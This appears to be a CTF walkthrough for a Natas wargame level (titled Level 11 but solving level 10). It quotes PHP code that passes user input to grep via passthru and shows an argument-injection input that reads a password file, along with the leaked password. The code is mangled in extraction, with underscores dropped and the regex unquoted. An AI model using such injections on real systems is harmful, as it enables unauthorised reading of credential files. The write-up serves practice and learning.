Natas - Level 11

2 November 2017

Connection information

Information given

The white box is composed of four parts:

  1. The first part is a text displaying : "For security reasons, we now filter on certain characters"
  2. The second part is an input box with the label Find words containing:
  3. The third is a button named Search
  4. The last is a link View sourcecode pointing to

Getting the password

    $key = "";
    if(array key exists("needle", $ REQUEST)) {
      $key = $ REQUEST["needle"];
    if($key != "") {
      if(preg match(/[;|&]/,$key)) {
        print "Input contains an illegal character!";
      } else {
        passthru("grep −i $key dictionary.txt");

As we can see we cannot use neither ";" nor "&" in our search from now on. No problem, we’ll just use grep to display everything in /etc/natas webpass/natas11.

We enter the following input:

.∗ /etc/natas webpass/natas11

Which displays:

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid−user
/etc/natas webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK